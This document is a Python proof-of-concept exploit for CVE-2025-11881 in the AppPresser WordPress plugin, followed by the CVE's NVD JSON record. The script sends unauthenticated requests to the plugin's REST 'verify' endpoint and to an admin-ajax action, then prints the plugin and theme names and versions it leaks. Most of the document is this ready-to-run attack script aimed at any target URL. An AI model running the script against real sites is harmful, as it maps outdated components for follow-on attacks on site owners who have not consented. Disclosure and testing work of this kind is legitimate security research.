CVE-2025-11881

# CVE-2025-11881 PoC - AppPresser Unauthenticated Information Disclosure # Target: WordPress site with AppPresser plugin <= 4.5.0 import requests import json import sys def exploit_apppresser(target_url): """ Exploit for CVE-2025-11881 Unauthenticated access to sensitive plugin/theme information """ # Target the vulnerable endpoint endpoint = f"{target_url}/wp-json/myappp/v1/verify" # Alternatively, try the direct function call alt_endpoint = f"{target_url}/wp-admin/admin-ajax.php" print(f"[*] Target: {target_url}") print(f"[*] Testing endpoint: {endpoint}") # Method 1: Direct REST API call try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: print("[+] Potential information disclosure detected!") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") # Method 2: AJAX endpoint with crafted request try: data = { 'action': 'myappp_verify', 'app_id': 'test', 'nonce': '' } response = requests.post(alt_endpoint, data=data, timeout=10) if response.status_code == 200 and 'plugins' in response.text.lower(): print("[+] Vulnerable endpoint found via AJAX!") print(f"[+] Response preview: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] AJAX request failed: {e}") print("[-] No vulnerable endpoint found or target not affected") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11881.py <target_url>") print("Example: python cve-2025-11881.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_apppresser(target)

{"cve": {"id": "CVE-2025-11881", "sourceIdentifier": "[email protected]", "published": "2025-10-30T07:15:32.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AppPresser – Mobile App Framework plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'myappp_verify' function in all versions up to, and including, 4.5.0. This makes it possible for unauthenticated attackers to extract sensitive data including plugin and theme names and version numbers, which can be used to facilitate targeted attacks against outdated or vulnerable components."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/apppresser/tags/4.5.0/inc/AppPresser_WPAPI_Mods.php#L162", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/apppresser/tags/4.5.0/inc/AppPresser_WPAPI_Mods.php#L879", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385855/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/62c3f54c-6bfb-4f11-9457-a09d28f83175?source=cve", "source": "[email protected]"}]}}